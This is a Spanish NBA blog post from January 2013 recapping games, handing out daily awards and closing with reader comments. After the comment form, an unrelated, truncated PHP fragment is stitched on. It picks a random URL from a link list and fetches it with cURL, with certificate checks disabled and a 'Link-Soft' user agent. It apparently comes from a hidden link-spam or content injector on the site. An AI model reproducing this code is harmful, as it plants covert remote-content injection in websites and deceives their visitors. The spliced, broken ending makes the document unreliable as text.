La Crónica: Año nuevo…

02 de January de 2013 por TheDeerHunter

Comenzamos el 2013 en plan perretes y hubo mutis en la habitual crónica. Nos perdimos los 29 rebotes de Vucevic y el conato de sorpresa de Orlando sobre los campeones; el fin de la racha negativa de los Bobcats, sobre Chicago nada menos, y la importante victoria de los Pacers sobre Grizzlies; también hubieramos hablado de las exhibiciones de Rockets, Spurs y Thunder sobre Hawks, Nets y Suns respectivamente.

Hoy desayunábamos con la derrota de los Clippers en Denver, que rompe una racha de 17 victorias. Por lo visto les sentó mal los polvorones y se les vió asombrosamente atascados en ataque. Los máximos anotadores, Griffin y Bledsoe, se quedaron en 12 puntos, para un total de 78. Los Nuggets se limitaron a funcionar más o menos como acostumbran. No cabe duda de que están capacitados para protagonizar este tipo de “sorpresas”.

Impresiona también el partidazo de Melo&Smith… pero para perder en el Madison ante Portland. A ver si el gafe va a ser Stoudemire, que ya cuenta con minutos. Por los Blazers sólidos Aldridge&Hickson y excelentes Batum&Lillard.

Nueva derrota de Lakers, en casa ante Sixers. Holiday&Turner les hicieron daño, pero más aún el impresentable 3 de 19 de Pau&Howard. Hoy no hay excusa en actuación del banco. Kobe volvió a ser el mejor.

Terminando, los Mavs rompieron su mini-crisis ante los facilones Wizards; Atlanta ganó también fácil a New Orleans; Detroit ganó a Sacramento gracias al estupendo rendimiento de su banco (Bynum, Daye, Drummond y Villanueva) Parece que les ha sentado bien la baja de Stuckey.

PREMIOS

MVP: Josh Smith (23-7-13, 3 robos y 4 tapones) y Jrue Holiday (26-10 y 2 robos) lideraron a sus respectivos equipos a la victoria. La hoja de servicios del de los Hawks es mejor pero Holiday la consiguió en casa de los Lakers.

Rookie: Damian Lillard volvió loca a la defensa de los Knicks. Acabó el partido con 21 puntos, 5 rebotes, 6 asistencias y 2 robos. Anthony Davis sigue demostrando que va camino de convertirse en una muralla defensiva. Anotó sólo 9 puntos pero capturó 13 rebotes y puso 4 tapones. Bradley Beal anotó 22 puntos.

Sorpresa: Vince Carter fue el mejor de los Mavs en su partido frente los Wizards. Aportó 23 puntos y un par de mates ‘marca de la casa’ que podéis ver en la selección de las 10 mejores jugadas del día.

Decepción: Jason Kidd y Steve Novak fallaron los 10 tiros que intentaron entre ambos. Aún así, peor lo hicieron Willie Green y Jamal Crawford. De 20 tiros a canasta solo convirtieron 3.

Esfuerzo en vano: Volvió Carmelo Anthony pero sus 45 puntos, 7 rebotes, 4 asistencias no fueron suficientes para dar la victoria a los Knicks.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. rumbero dice:
    #1

    Ya les tocaba a los Clippers un partido malo. Se les vió sin ritmo ni acierto durante todo el partido si, y eso lo aprovecharon los Nuggets en general y Miller en particular. Un partidazo se marcó este señor que parece que lleva toda la vida jugando a otra velocidad que el resto. Partido completito de Iguodala también, muy de su estilo.
    Lo mejor de la noche por eso es el triple para acabar el tercer cuarto de Mcgee (si si, el mismo) y que casi finiquitaba cualquier esperanza de remontada de los Clippers.

    Para los seguidores de los Lakers que lo hayan visto ¿Ha sido tan malo el partido de Gasol como parece? Es que entre el 2/12 y un par de acciones defensivas en el último cuarto en los queda bastante retratado seguro que ya tienen tema en LA…

      Citar

  2. Esteban dice:
    #2

    lo de los lakers empieza a ser preocupante enserio, luego de una mini racha positiva ya deberian estar a otro nivel y aun asi siguen con idas y venidas

    estaran en PO y seran peligrosos, pero habiendo jugado 30 partidos, dan toda la impresion de ser carne de primera ronda

      Citar

  3. Futurman dice:
    #3

    Gasol horrible, aunque me voy con la sensación que le pitan pocas faltas a favor. Howard pésimo en ataque y digno en defensa y Los Lakers que no pasan del 50% pese a Bryant, que está inmenso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>